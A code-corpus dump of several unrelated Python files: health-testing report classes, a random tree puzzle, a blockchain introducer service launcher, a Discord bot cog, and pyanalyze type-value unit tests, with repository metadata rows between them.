        for loc_key in self.keys:
            selected_disease = self.request.GET.get('test_type_disease', '')
            selected_disease = selected_disease.split(':') if selected_disease else None
            diseases = [selected_disease[0]] if selected_disease else self.diseases["ids"]
            for disease in diseases:
                row = [capitalize_fn(x) for x in loc_key]
                disease_names = self.diseases["names"]
                index = self.diseases['ids'].index(disease)
                row.append(disease_names[index])
                for n, day in enumerate(self.daterange(startdate, enddate)):
                    # Aggregated data is keyed on (place..., date, disease).
                    temp_key = [loc for loc in loc_key]
                    temp_key.append(iso_string_to_date(day))
                    temp_key.append(disease)
                    keymap = old_data.get(tuple(temp_key), None)
                    day_count = (keymap["day_count"] if keymap else None)
                    row.append(format_datatables_data(day_count or self.no_value, day_count or 0))
                rows.append(row)
        self.total_row = calculate_total_row(rows)
        self.total_row[0] = 'Total'
        return rows

    @property
    def charts(self):
        rows = self.rows
        date_index = len(self.place_types)
        startdate = self.datespan.startdate
        enddate = self.datespan.enddate
        date_axis = Axis(label="Date", dateFormat="%b %d")
        tests_axis = Axis(label="Number of Tests")
        chart = LineChart("Number of Tests Per Day", date_axis, tests_axis)
        for row in rows:
            data_points = []
            for n, day in enumerate(self.daterange(startdate, enddate)):
                cell = row[date_index + n + 1]
                # BUGFIX: the original replaced a "--" cell with the int 0 and
                # then still evaluated y['sort_key'], which would raise
                # TypeError; take sort_key only from dict cells.
                y = 0 if cell == "--" else cell['sort_key']
                data_points.append({'x': day, 'y': y})
            chart.add_dataset(row[date_index - 1] + "(" + row[date_index] + ")", data_points)
        return [chart]
class GSIDSQLTestLotsReport(GSIDSQLReport):
    """Per-lot test counts, grouped by test version, for previewer users only."""
    name = "Test Lots Report"
    slug = "test_lots_sql"
    section_name = "test lots"

    @classmethod
    def show_in_navigation(cls, domain=None, project=None, user=None):
        return user and user.is_previewer()

    @property
    def group_by(self):
        return super(GSIDSQLTestLotsReport, self).group_by + ["test_version", "lot_number"]

    @property
    def columns(self):
        return self.common_columns + [
            DatabaseColumn("Test", CountColumn('doc_id', alias="lot_count"))
        ]

    @property
    def test_lots_map(self):
        """Map each test version seen in the data to its list of lot numbers."""
        old_data = self.data
        lots_map = dict()
        for key in old_data.keys():
            # key[-2] is the test version, key[-1] the lot number (see group_by).
            lots_map.setdefault(key[-2], []).append(key[-1])
        return lots_map

    @property
    def selected_tests(self):
        """Test names to show: explicit test > tests of a disease > all tests."""
        disease = self.request.GET.get('test_type_disease', '')
        test = self.request.GET.get('test_type_test', '')
        disease = disease.split(':') if disease else None
        test = test.split(':') if test else None
        if test:
            return [test[0]]
        elif disease:
            test_fixtures = FixtureDataItem.by_field_value(
                self.domain,
                FixtureDataType.by_domain_tag(self.domain, "test").one(),
                "disease_id",
                disease[0]
            )
            return [t.fields_without_attributes["test_name"] for t in test_fixtures]
        else:
            return self.test_types

    @property
    def rows(self):
        test_lots_map = self.test_lots_map
        selected_tests = self.selected_tests
        old_data = self.data
        rows = []
        for loc_key in self.keys:
            row = [capitalize_fn(loc) for loc in loc_key]
            for test in selected_tests:
                test_lots = test_lots_map.get(test, None)
                if not test_lots:
                    # Matches the single "NO-LOTS" header column for this test.
                    row.append(format_datatables_data(self.no_value, 0))
                    continue
                total_test_count = 0
                for lot_number in test_lots:
                    temp_key = [loc for loc in loc_key] + [test, lot_number]
                    data_map = old_data.get(tuple(temp_key), None)
                    lot_count = data_map["lot_count"] if data_map else None
                    row.append(format_datatables_data(lot_count or self.no_value, lot_count or 0))
                    total_test_count += data_map["lot_count"] if data_map else 0
                row.append(format_datatables_data(total_test_count or self.no_value, total_test_count or 0))
            rows.append(row)
        self.total_row = calculate_total_row(rows)
        self.total_row[0] = 'Total'
        return rows

    @property
    def headers(self):
        """Place columns, then per test a group of lot columns plus a TOTAL."""
        column_headers = [DataTablesColumn(loc.capitalize()) for loc in self.group_by[:-2]]
        test_lots_map = self.test_lots_map
        for test in self.selected_tests:
            lots_headers = [test]
            lots = test_lots_map.get(test, None)
            if not lots:
                lots_headers.append(DataTablesColumn("NO-LOTS"))
                column_headers.append(DataTablesColumnGroup(*lots_headers))
                continue
            for lot in lots:
                lots_headers.append(DataTablesColumn(str(lot)))
            lots_headers.append(DataTablesColumn("TOTAL"))
            column_headers.append(DataTablesColumnGroup(*lots_headers))
        return DataTablesHeader(*column_headers)
class GSIDSQLByAgeReport(GSIDSQLReport):
    """Positive-test breakdown per place, split by gender and age bucket."""
    name = "Age Summary Report"
    slug = "age_summary_sql"
    section_name = "age summary"

    @property
    def filter_values(self):
        # Named bounds for the BETWEEN/GT age filters built in `columns`.
        age_filters = dict(
            zero=0,
            ten=10,
            ten_plus=11,
            twenty=20,
            twenty_plus=21,
            fifty=50
        )
        default_filter_values = super(GSIDSQLByAgeReport, self).filter_values
        default_filter_values.update(age_filters)
        return default_filter_values

    def percent_fn(self, x, y):
        """Format x as "count (percent%)" of y; sorts on the raw count."""
        return dict(
            sort_key=x or 0,
            html="%(x)s (%(p)s%%)" % {"x": int(x or 0), "p": 100 * (x or 0) / (y or 1)})

    @property
    def columns(self):
        """Place columns + totals + per-gender positive counts by age bucket.

        NOTE: `rows` patches the total row via fixed negative offsets, so the
        column order and count here must not change.
        """
        female_range_group = DataTablesColumnGroup("Female Positive Tests (% positive)")
        male_range_group = DataTablesColumnGroup("Male Positive Tests (% positive)")

        def age_range_filter(gender, age_from, age_to):
            return [AND([EQ("gender", gender), EQ("diagnosis", "positive"), BETWEEN("age", age_from, age_to)])]

        def generate_columns(gender):
            # BUGFIX: was `gender is "male"` — identity comparison against a
            # string literal, which only works by CPython interning accident.
            age_range_group = male_range_group if gender == "male" else female_range_group
            return [
                AggregateColumn(
                    "0-10", self.percent_fn,
                    [
                        CountColumn(
                            'doc_id',
                            alias="zero_ten_" + gender,
                            filters=self.filters + age_range_filter(gender, "zero", "ten")
                        ),
                        AliasColumn(gender + "_total")
                    ],
                    header_group=age_range_group, sort_type=DTSortType.NUMERIC
                ),
                AggregateColumn(
                    "10-20", self.percent_fn,
                    [
                        CountColumn(
                            'doc_id',
                            alias="ten_twenty_" + gender,
                            filters=self.filters + age_range_filter(gender, "ten_plus", "twenty")
                        ),
                        AliasColumn(gender + "_total")
                    ],
                    header_group=age_range_group, sort_type=DTSortType.NUMERIC
                ),
                AggregateColumn(
                    "20-50", self.percent_fn,
                    [
                        CountColumn(
                            'doc_id',
                            alias="twenty_fifty_" + gender,
                            filters=self.filters + age_range_filter(gender, "twenty_plus", "fifty")
                        ),
                        AliasColumn(gender + "_total")
                    ],
                    header_group=age_range_group, sort_type=DTSortType.NUMERIC
                ),
                AggregateColumn(
                    "50+", self.percent_fn,
                    [
                        CountColumn(
                            'doc_id',
                            alias="fifty_" + gender,
                            filters=self.filters + [AND([EQ("gender", gender), EQ("diagnosis", "positive"), GT("age", "fifty")])]),
                        AliasColumn(gender + "_total")
                    ],
                    header_group=age_range_group, sort_type=DTSortType.NUMERIC
                ),
                AggregateColumn(
                    "Total", self.percent_fn,
                    [
                        CountColumn(
                            'doc_id',
                            alias="positive_total_" + gender,
                            filters=self.filters + [AND([EQ("gender", gender), EQ("diagnosis", "positive")])]),
                        CountColumn(
                            'doc_id',
                            alias=gender + "_total",
                            filters=self.filters + [EQ("gender", gender)]),
                    ],
                    header_group=age_range_group, sort_type=DTSortType.NUMERIC
                ),
            ]

        totals_group = DataTablesColumnGroup("Total tests")
        sum_fn = lambda x, y: int(x or 0) + int(y or 0)
        return self.common_columns + [
            DatabaseColumn(
                "Males ",
                AliasColumn("male_total"),
                header_group=totals_group
            ),
            DatabaseColumn(
                "Females ",
                AliasColumn("female_total"),
                header_group=totals_group
            ),
            AggregateColumn(
                "Total", sum_fn,
                [AliasColumn("male_total"), AliasColumn("female_total")],
                header_group=totals_group
            ),
        ] + generate_columns("male") + generate_columns("female")

    @property
    def rows(self):
        rows = super(GSIDSQLByAgeReport, self).rows
        self.total_row[0] = 'Total'
        # Custom total-row formatting: recompute the five percentage cells per
        # gender from the raw totals (negative indices from the row's end).
        tot_col_start = -13
        m_tot = self.total_row[tot_col_start]
        f_tot = self.total_row[tot_col_start + 1]
        m_pos_start = -10
        self.total_row[m_pos_start] = self.percent_fn(self.total_row[m_pos_start], m_tot)
        self.total_row[m_pos_start + 1] = self.percent_fn(self.total_row[m_pos_start + 1], m_tot)
        self.total_row[m_pos_start + 2] = self.percent_fn(self.total_row[m_pos_start + 2], m_tot)
        self.total_row[m_pos_start + 3] = self.percent_fn(self.total_row[m_pos_start + 3], m_tot)
        self.total_row[m_pos_start + 4] = self.percent_fn(self.total_row[m_pos_start + 4], m_tot)
        f_pos_start = -5
        self.total_row[f_pos_start] = self.percent_fn(self.total_row[f_pos_start], f_tot)
        self.total_row[f_pos_start + 1] = self.percent_fn(self.total_row[f_pos_start + 1], f_tot)
        self.total_row[f_pos_start + 2] = self.percent_fn(self.total_row[f_pos_start + 2], f_tot)
        self.total_row[f_pos_start + 3] = self.percent_fn(self.total_row[f_pos_start + 3], f_tot)
        self.total_row[f_pos_start + 4] = self.percent_fn(self.total_row[f_pos_start + 4], f_tot)
        return rows
class PatientMapReport(GenericMapReport, CustomProjectReport):
    """Map view of the patient summary, fed by GSIDSQLPatientReport."""
    name = "Patient Summary (Map)"
    slug = "patient_summary_map"
    fields = ['custom.apps.gsid.reports.TestField',
              'corehq.apps.reports.filters.dates.DatespanFilter',
              'custom.apps.gsid.reports.AsyncClinicField',
              'custom.apps.gsid.reports.AggregateAtField']
    data_source = {
        'adapter': 'legacyreport',
        'geo_column': 'gps',
        'report': 'custom.apps.gsid.reports.sql_reports.GSIDSQLPatientReport',
        'report_params': {'map': True}
    }

    @property
    def display_config(self):
        """Map display settings: column titles, popup detail and table columns."""
        return {
            'column_titles': {
                'Positive Tests::Female +ve Percent': 'Positive tests: Female',
                'Positive Tests::Male +ve Percent': 'Positive tests: Male',
                'Positive Tests::Total +ve Percent': 'Positive tests: Total',
                'Tests::Number of Females ': 'Total tests: Female',
                'Tests::Number of Males ': 'Total tests: Male',
                'Tests::Total': 'Total tests',
                'Age Range::All age range': 'Age range: All',
                'Age Range::Female age range': 'Age range: Female',
                'Age Range::Male age range': 'Age range: Male',
                'disease': 'Disease',
            },
            'detail_columns': self.place_types + [
                'disease',
                '__space__',
                'Positive Tests::Female +ve Percent',
                'Positive Tests::Male +ve Percent',
                'Positive Tests::Total +ve Percent',
                'Tests::Number of Females ',
                'Tests::Number of Males ',
                'Tests::Total',
            ],
            'table_columns': self.place_types + [
                'Tests::Number of Females ',
                'Tests::Number of Males ',
                'Tests::Total',
                'Positive Tests::Female +ve Percent',
                'Positive Tests::Male +ve Percent',
                'Positive Tests::Total +ve Percent',
                'Age Range::Female age range',
                'Age Range::Male age range',
                'Age Range::All age range',
            ],
            # Underscore.js template rendered client-side for map popups.
            'detail_template': """<div class="default-popup">
                <table>
                    <% _.each(info, function(field) { %>
                    <tr class="data data-<%= field.slug %>">
                        <% if (field.slug === '__space__') { %>
                        <td> </td><td> </td>
                        <% } else { %>
                        <td><%= field.label %></td>
                        <td class="detail_data">
                        <%= field.value %>
                        </td>
                        <% } %>
                    </tr>
                    <% }); %>
                </table>
                </div>"""
        }

    @property
    def agg_level(self):
        agg_at = self.request.GET.get('aggregate_at', None)
        return agg_at if agg_at else 'clinic'

    @property
    def place_types(self):
        # Title-cased, because the map layer matches on display names.
        opts = ['country', 'province', 'district', 'clinic']
        agg_at = self.agg_level
        return [o.title() for o in opts[:opts.index(agg_at) + 1]]
| 39.014031 | 136 | 0.565077 |
795ba3610878abe65fc03a09b97d92840e3d238b | 1,484 | py | Python | PYTHON/scripts/puzzles/twoBranch.py | oruanaidh-ai/wayback_machine | 2529fc9e18120a092890abbb94483f643682fb90 | [
"BSD-2-Clause"
] | null | null | null | PYTHON/scripts/puzzles/twoBranch.py | oruanaidh-ai/wayback_machine | 2529fc9e18120a092890abbb94483f643682fb90 | [
"BSD-2-Clause"
] | null | null | null | PYTHON/scripts/puzzles/twoBranch.py | oruanaidh-ai/wayback_machine | 2529fc9e18120a092890abbb94483f643682fb90 | [
"BSD-2-Clause"
] | null | null | null | class Node:
pass
import random
top = Node()


def buildTree(t, lev=5):
    """
    Build a random tree. It is not a binary tree.
    Subnodes (if they exist) are placed inside a vector.
    There can be as many as fifteen subnodes.
    """
    if lev == 0:
        return
    subnodes = []
    for i in range(15):
        node = Node()
        # Deeper levels are more likely to spawn a child.
        if random.random() < 1.0 - 1.0 / (lev + 1):
            # BUGFIX: the original appended buildTree()'s return value, which
            # is None at the bottom level; append the node itself instead. A
            # node that never received a `subnodes` attribute is treated as a
            # leaf by the traversals below, exactly like None was.
            buildTree(node, lev - 1)
            subnodes.append(node)
    t.subnodes = subnodes
    return t


tree = buildTree(top, 5)
# Memo table for countNodes, keyed by node identity.
count = {}


def countNodes(t):
    """Memoized count of all nodes in the (sub)tree rooted at t."""
    if t in count:
        return count[t]
    if hasattr(t, 'subnodes'):
        count[t] = 1 + sum(countNodes(x) for x in t.subnodes)
    else:
        # Leaf: a node without a `subnodes` attribute counts as itself only.
        count[t] = 1
    return count[t]


# print() with a single argument is valid in both Python 2 and 3
# (the original used the Python-2-only `print x` statement form).
print(countNodes(tree))
# Memo table for depth, keyed by node identity.
tree_memory = {}


def depth(t):
    """Memoized height of the (sub)tree rooted at t (a leaf has depth 1)."""
    if t in tree_memory:
        return tree_memory[t]
    if hasattr(t, 'subnodes') and len(t.subnodes):
        tree_memory[t] = 1 + max(depth(s) for s in t.subnodes)
    else:
        tree_memory[t] = 1
    return tree_memory[t]


print(depth(tree))
# Memo table for doubleDeep, keyed by node identity.
ddeep = {}


def doubleDeep(t):
    """Memoized length of the longest two-branch path through the tree.

    For each node with at least two children the candidate value is
    1 + (sum of its two deepest child depths); the answer is the maximum
    candidate over the whole subtree.
    """
    if t in ddeep:
        return ddeep[t]
    if hasattr(t, 'subnodes') and len(t.subnodes) >= 2:
        # Two largest child depths form the best path through this node.
        dd = [depth(n) for n in t.subnodes]
        dd.sort()
        v = 1 + dd[-2] + dd[-1]
    else:
        v = 1
    if hasattr(t, 'subnodes') and len(t.subnodes) >= 1:
        # The best path might lie entirely inside one child's subtree.
        maxVsubnode = max(doubleDeep(n) for n in t.subnodes)
        if v < maxVsubnode:
            v = maxVsubnode
    ddeep[t] = v
    return ddeep[t]


print(doubleDeep(tree))
| 21.2 | 62 | 0.578167 |
795ba3855053a137b2481d91c6ec7ffcb94c78c9 | 1,294 | py | Python | shibgreen/server/start_introducer.py | BTCgreen-Network/shibgreen-blockchain | b1e41e82ad849775543aa36fefc0c0d03e13f6e8 | [
"Apache-2.0"
] | 12 | 2021-11-10T02:52:38.000Z | 2022-03-22T10:19:45.000Z | shibgreen/server/start_introducer.py | BTCgreen-Network/shibgreen-blockchain | b1e41e82ad849775543aa36fefc0c0d03e13f6e8 | [
"Apache-2.0"
] | 13 | 2021-11-16T03:09:34.000Z | 2022-03-09T00:45:05.000Z | shibgreen/server/start_introducer.py | BTCgreen-Network/shibgreen-blockchain | b1e41e82ad849775543aa36fefc0c0d03e13f6e8 | [
"Apache-2.0"
] | 1 | 2022-03-15T08:25:06.000Z | 2022-03-15T08:25:06.000Z | import pathlib
from typing import Dict
from shibgreen.introducer.introducer import Introducer
from shibgreen.introducer.introducer_api import IntroducerAPI
from shibgreen.server.outbound_message import NodeType
from shibgreen.server.start_service import run_service
from shibgreen.util.config import load_config_cli
from shibgreen.util.default_root import DEFAULT_ROOT_PATH
# See: https://bugs.python.org/issue29288
# Force the "idna" codec to be loaded at import time, working around the
# threading deadlock described in the issue above.
"".encode("idna")
# Section name used when loading this service's config and naming it.
SERVICE_NAME = "introducer"
def service_kwargs_for_introducer(
    root_path: pathlib.Path,
    config: Dict,
) -> Dict:
    """Build the run_service() kwargs describing the introducer service.

    `config` is the "introducer" section of the node's config.yaml.
    """
    introducer = Introducer(config["max_peers_to_send"], config["recent_peer_threshold"])
    # Renamed local from the original's `node__api` (double-underscore typo).
    node_api = IntroducerAPI(introducer)
    network_id = config["selected_network"]
    kwargs = dict(
        root_path=root_path,
        node=introducer,
        peer_api=node_api,
        node_type=NodeType.INTRODUCER,
        advertised_port=config["port"],
        service_name=SERVICE_NAME,
        server_listen_ports=[config["port"]],
        network_id=network_id,
    )
    return kwargs
def main() -> None:
    """Load the introducer config and run the service until it exits."""
    config = load_config_cli(DEFAULT_ROOT_PATH, "config.yaml", SERVICE_NAME)
    kwargs = service_kwargs_for_introducer(DEFAULT_ROOT_PATH, config)
    # NOTE(review): run_service's result is returned despite the `-> None`
    # annotation; presumably it returns None — confirm upstream.
    return run_service(**kwargs)


if __name__ == "__main__":
    main()
| 28.755556 | 89 | 0.74575 |
795ba500d6e4e362e9ca6c7f5d40140382346b22 | 2,145 | py | Python | cogs/server_info.py | NilsRG/discord-bot | 2f4dd1511a011a524c01d875f3cb55c0cc48cad9 | [
"MIT"
] | 1 | 2021-03-04T23:24:39.000Z | 2021-03-04T23:24:39.000Z | cogs/server_info.py | dylanbuchi/discord-bot-sb | 374a062bce669c13d8ecdf876a10e48d3bd884cd | [
"MIT"
] | null | null | null | cogs/server_info.py | dylanbuchi/discord-bot-sb | 374a062bce669c13d8ecdf876a10e48d3bd884cd | [
"MIT"
] | 2 | 2021-03-06T10:56:21.000Z | 2021-06-30T12:40:24.000Z | import discord, datetime, time
from discord.ext import commands
from datetime import datetime, timedelta
from cogs.admin_config import get_guild_delete_timer
# Bot start time, recorded at import; the `uptime` command reports time
# elapsed relative to this.
start_time = time.time()
class Server(commands.Cog):
    """Misc server commands: latency check (`ping`) and bot uptime (`uptime`)."""

    def __init__(self, client):
        self.client = client

    @commands.command(name='ping',
                      description='Ping Pong & latency in milliseconds')
    async def ping_command(self, ctx):
        """Reply with the bot's websocket latency in milliseconds."""
        # BUGFIX: Client.latency is in *seconds*; convert to milliseconds as
        # the command description promises (the original displayed raw
        # seconds labelled as ms).
        text = f'🏓 (~{round(self.client.latency * 1000, 1)} ms)'
        embed = discord.Embed(colour=discord.Colour.green())
        embed.add_field(name="Pong!", value=text)
        await ctx.send(embed=embed, delete_after=get_guild_delete_timer())
        await ctx.message.delete(delay=get_guild_delete_timer())

    @commands.command(name='uptime', description='Time since Bot started')
    async def uptime_command(self, ctx):
        """Reply with how long the bot process has been running."""
        current_time = time.time()
        difference = int(round(current_time - start_time))
        text = str(timedelta(seconds=difference))
        embed = discord.Embed(colour=discord.Colour.red())
        embed.add_field(name="Uptime", value=text)
        try:
            await ctx.send(embed=embed, delete_after=get_guild_delete_timer())
            await ctx.message.delete(delay=get_guild_delete_timer())
        except discord.HTTPException:
            # Sending the embed can fail (e.g. missing embed permission);
            # fall back to a plain-text reply.
            await ctx.send("Current uptime: " + text)
            await ctx.message.delete(delay=get_guild_delete_timer())
def setup(client):
    """Entry point used by discord.py extension loading."""
    client.add_cog(Server(client))
795ba527a487cfb2b9717a1ce78f6f2facdd25a4 | 10,137 | py | Python | pyanalyze/test_value.py | sobolevn/pyanalyze | f3851db84e57e3ff7f8e2dd271c3b218e2d3bbcc | [
"Apache-2.0"
] | null | null | null | pyanalyze/test_value.py | sobolevn/pyanalyze | f3851db84e57e3ff7f8e2dd271c3b218e2d3bbcc | [
"Apache-2.0"
] | null | null | null | pyanalyze/test_value.py | sobolevn/pyanalyze | f3851db84e57e3ff7f8e2dd271c3b218e2d3bbcc | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from qcore.asserts import assert_eq, assert_in, assert_is, assert_is_not
from . import tests
from . import value
from .value import KnownValue, TypedValue, MultiValuedValue, SubclassValue
from .test_node_visitor import skip_before
def test_UNRESOLVED_VALUE():
    """UNRESOLVED_VALUE models an unknown type, so is_type never holds."""
    assert not value.UNRESOLVED_VALUE.is_type(int)
def test_known_value():
    """KnownValue wraps a concrete runtime value."""
    val = KnownValue(3)
    assert_eq(3, val.val)
    assert_eq("Literal[3]", str(val))
    assert_eq("Literal['']", str(KnownValue("")))
    assert val.is_type(int)
    assert not val.is_type(str)
    assert val.is_value_compatible(KnownValue(3))
    assert val.is_value_compatible(TypedValue(int))
    assert val.is_value_compatible(MultiValuedValue([KnownValue(3), TypedValue(int)]))
    assert not val.is_value_compatible(
        MultiValuedValue([KnownValue("x"), TypedValue(int)])
    )
    assert TypedValue(int).is_value_compatible(val)
    assert not TypedValue(str).is_value_compatible(val)
    assert not val.is_value_compatible(SubclassValue(int))
    assert KnownValue(int).is_value_compatible(SubclassValue(int))
    assert not KnownValue(str).is_value_compatible(SubclassValue(int))
def test_unbound_method_value():
    """UnboundMethodValue resolves (possibly nested) methods on a class."""
    val = value.UnboundMethodValue("get_prop_with_get", tests.PropertyObject)
    assert_eq("<method get_prop_with_get on pyanalyze.tests.PropertyObject>", str(val))
    assert_eq("get_prop_with_get", val.attr_name)
    assert_is(tests.PropertyObject, val.typ)
    assert_is(None, val.secondary_attr_name)
    assert_eq(tests.PropertyObject.get_prop_with_get, val.get_method())
    assert val.is_type(object)
    assert not val.is_type(str)

    # secondary_attr_name selects an attribute of the method (here .asynq).
    val = value.UnboundMethodValue(
        "get_prop_with_get", tests.PropertyObject, secondary_attr_name="asynq"
    )
    assert_eq(
        "<method get_prop_with_get.asynq on pyanalyze.tests.PropertyObject>", str(val)
    )
    assert_eq("get_prop_with_get", val.attr_name)
    assert_is(tests.PropertyObject, val.typ)
    assert_eq("asynq", val.secondary_attr_name)
    method = val.get_method()
    assert_in(method.__name__, tests.ASYNQ_METHOD_NAMES)
    assert_eq(tests.PropertyObject.get_prop_with_get, method.__self__)
    assert val.is_type(object)
    assert not val.is_type(str)
def test_typed_value():
    """TypedValue matches any instance of its type."""
    val = TypedValue(str)
    assert_is(str, val.typ)
    assert_eq("str", str(val))
    assert val.is_type(str)
    assert not val.is_type(int)
    assert val.is_value_compatible(TypedValue(str))
    assert not val.is_value_compatible(TypedValue(int))
    assert val.is_value_compatible(MultiValuedValue([KnownValue("x"), TypedValue(str)]))
    assert not val.is_value_compatible(
        MultiValuedValue([KnownValue("x"), TypedValue(int)])
    )

    float_val = TypedValue(float)
    assert_eq("float", str(float_val))
    assert float_val.is_value_compatible(KnownValue(1.0))
    # int accepted where float is expected — presumably the PEP 484 numeric
    # tower; confirm against pyanalyze's compatibility rules.
    assert float_val.is_value_compatible(KnownValue(1))
    assert not float_val.is_value_compatible(KnownValue(""))
    assert float_val.is_value_compatible(TypedValue(float))
    assert float_val.is_value_compatible(TypedValue(int))
    assert not float_val.is_value_compatible(TypedValue(str))
    assert float_val.is_value_compatible(TypedValue(value.mock.Mock))
    assert not float_val.is_value_compatible(SubclassValue(float))
    assert TypedValue(type).is_value_compatible(SubclassValue(float))
def test_subclass_value():
    """SubclassValue(int) accepts int and subclasses of int as class objects."""
    val = SubclassValue(int)
    assert val.is_value_compatible(KnownValue(int))
    assert val.is_value_compatible(KnownValue(bool))
    assert not val.is_value_compatible(KnownValue(str))
    assert val.is_value_compatible(TypedValue(type))
    assert not val.is_value_compatible(TypedValue(int))
    assert val.is_value_compatible(SubclassValue(bool))
    assert not val.is_value_compatible(SubclassValue(str))
def test_generic_value():
    """GenericValue is a parametrized type like list[int]."""
    val = value.GenericValue(list, [TypedValue(int)])
    assert_eq("list[int]", str(val))
    assert val.is_value_compatible(TypedValue(list))
    assert val.is_value_compatible(value.GenericValue(list, [value.UNRESOLVED_VALUE]))
    assert val.is_value_compatible(value.GenericValue(list, [TypedValue(bool)]))
    assert not val.is_value_compatible(value.GenericValue(list, [TypedValue(str)]))
    assert not val.is_value_compatible(value.GenericValue(set, [TypedValue(int)]))
    # A generic tuple with one parameter renders as a homogeneous tuple.
    assert_eq("tuple[int, ...]", str(value.GenericValue(tuple, [TypedValue(int)])))
def test_sequence_incomplete_value():
    """SequenceIncompleteValue tracks per-position element types."""
    val = value.SequenceIncompleteValue(tuple, [TypedValue(int), TypedValue(str)])
    assert_eq("tuple[int, str]", str(val))
    assert val.is_value_compatible(TypedValue(tuple))
    assert val.is_value_compatible(
        value.GenericValue(
            tuple, [MultiValuedValue([TypedValue(int), TypedValue(str)])]
        )
    )
    assert not val.is_value_compatible(
        value.GenericValue(
            tuple, [MultiValuedValue([TypedValue(int), TypedValue(list)])]
        )
    )
    assert val.is_value_compatible(val)
    # Mismatched length is incompatible; per-position subtypes are fine.
    assert not val.is_value_compatible(
        value.SequenceIncompleteValue(tuple, [TypedValue(int)])
    )
    assert val.is_value_compatible(
        value.SequenceIncompleteValue(tuple, [TypedValue(bool), TypedValue(str)])
    )
def test_multi_valued_value():
    """MultiValuedValue is a union of alternatives."""
    val = MultiValuedValue([TypedValue(int), KnownValue(None)])
    assert_eq("Union[int, None]", str(val))
    assert val.is_value_compatible(KnownValue(1))
    assert val.is_value_compatible(KnownValue(None))
    assert not val.is_value_compatible(KnownValue(""))
    assert not val.is_value_compatible(TypedValue(float))
    assert val.is_value_compatible(val)
    assert not val.is_value_compatible(
        MultiValuedValue([KnownValue(None), TypedValue(str)])
    )
    # Nested unions are flattened for compatibility purposes.
    assert val.is_value_compatible(
        MultiValuedValue(
            [
                value.UNRESOLVED_VALUE,
                MultiValuedValue([TypedValue(int), KnownValue(None)]),
            ]
        )
    )
class ThriftEnum(object):
    """Minimal stand-in for a Thrift-generated enum (int constants + name maps)."""
    X = 0
    Y = 1
    _VALUES_TO_NAMES = {0: "X", 1: "Y"}
    _NAMES_TO_VALUES = {"X": 0, "Y": 1}
def test_is_value_compatible_thrift_enum():
    """A Thrift enum type accepts its member ints (but not other values)."""
    val = TypedValue(ThriftEnum)
    assert val.is_value_compatible(KnownValue(0))
    assert not val.is_value_compatible(KnownValue(2))
    assert not val.is_value_compatible(KnownValue(1.0))
    assert val.is_value_compatible(TypedValue(int))
    assert val.is_value_compatible(TypedValue(ThriftEnum))
    assert not val.is_value_compatible(TypedValue(str))
def test_subclass_value_display():
    """str()/attribute behavior of SubclassValue.

    BUGFIX: this function was also named test_subclass_value, shadowing the
    earlier compatibility test of the same name so it never ran under pytest;
    renamed so both are collected.
    """
    val = value.SubclassValue(str)
    assert_eq("Type[str]", str(val))
    assert_is(str, val.typ)
    assert val.is_type(str)
    assert not val.is_type(int)
def test_variable_name_value():
    """VariableNameValue.from_varname resolves names (and name suffixes)."""
    uid_val = value.VariableNameValue(["uid", "viewer"])
    varname_map = {
        "uid": uid_val,
        "viewer": uid_val,
        "actor_id": value.VariableNameValue(["actor_id"]),
    }
    assert_is(None, value.VariableNameValue.from_varname("capybaras", varname_map))
    val = value.VariableNameValue.from_varname("uid", varname_map)
    assert_is(val, value.VariableNameValue.from_varname("viewer", varname_map))
    # "old_uid" resolves to the same value as "uid".
    assert_is(val, value.VariableNameValue.from_varname("old_uid", varname_map))
    assert_is_not(val, value.VariableNameValue.from_varname("actor_id", varname_map))
def test_typeddict_value():
    """TypedDictValue requires the declared keys with compatible value types."""
    val = value.TypedDictValue({"a": TypedValue(int), "b": TypedValue(str)})
    # dict iteration order in some Python versions is not deterministic
    assert_in(
        str(val), ['TypedDict({"a": int, "b": str})', 'TypedDict({"b": str, "a": int})']
    )
    assert val.is_value_compatible(value.UNRESOLVED_VALUE)
    assert val.is_value_compatible(TypedValue(dict))
    assert not val.is_value_compatible(TypedValue(str))
    # KnownValue of dict
    assert val.is_value_compatible(KnownValue({"a": 1, "b": "2"}))
    # extra keys are ok
    assert val.is_value_compatible(KnownValue({"a": 1, "b": "2", "c": 1}))
    # missing key
    assert not val.is_value_compatible(KnownValue({"a": 1}))
    # wrong type
    assert not val.is_value_compatible(KnownValue({"a": 1, "b": 2}))
    # TypedDictValue
    assert val.is_value_compatible(val)
    assert val.is_value_compatible(
        value.TypedDictValue({"a": KnownValue(1), "b": TypedValue(str)})
    )
    assert val.is_value_compatible(
        value.TypedDictValue(
            {"a": KnownValue(1), "b": TypedValue(str), "c": TypedValue(float)}
        )
    )
    assert not val.is_value_compatible(
        value.TypedDictValue({"a": KnownValue(1), "b": TypedValue(int)})
    )
    assert not val.is_value_compatible(value.TypedDictValue({"b": TypedValue(str)}))
    # DictIncompleteValue
    assert val.is_value_compatible(
        value.DictIncompleteValue(
            [(KnownValue("a"), TypedValue(int)), (KnownValue("b"), TypedValue(str))]
        )
    )
    assert val.is_value_compatible(
        value.DictIncompleteValue(
            [
                (KnownValue("a"), TypedValue(int)),
                (KnownValue("b"), TypedValue(str)),
                (KnownValue("c"), value.UNRESOLVED_VALUE),
            ]
        )
    )
    assert val.is_value_compatible(
        value.DictIncompleteValue(
            [
                (KnownValue("a"), TypedValue(int)),
                (value.UNRESOLVED_VALUE, TypedValue(str)),
            ]
        )
    )
    assert not val.is_value_compatible(
        value.DictIncompleteValue([(value.UNRESOLVED_VALUE, TypedValue(str))])
    )
    assert not val.is_value_compatible(
        value.DictIncompleteValue(
            [(KnownValue("a"), TypedValue(int)), (KnownValue("b"), TypedValue(float))]
        )
    )
@skip_before((3, 5))
def test_new_type_value():
    """Distinct NewTypes over the same base are mutually incompatible."""
    from typing import NewType

    nt1 = NewType("nt1", int)
    nt1_val = value.NewTypeValue(nt1)
    nt2 = NewType("nt2", int)
    nt2_val = value.NewTypeValue(nt2)
    assert not nt1_val.is_value_compatible(nt2_val)
    # This should eventually return False
    assert nt1_val.is_value_compatible(TypedValue(int))
    assert TypedValue(int).is_value_compatible(nt1_val)
| 35.819788 | 88 | 0.702377 |
795ba57d9887b20be8c07af6c6c3fe3480a9798d | 2,411 | py | Python | homeassistant/components/met/config_flow.py | alemuro/home-assistant | 9b1315d8e55f0ca906c4c8a1b2ae8c2ea511dc90 | [
"Apache-2.0"
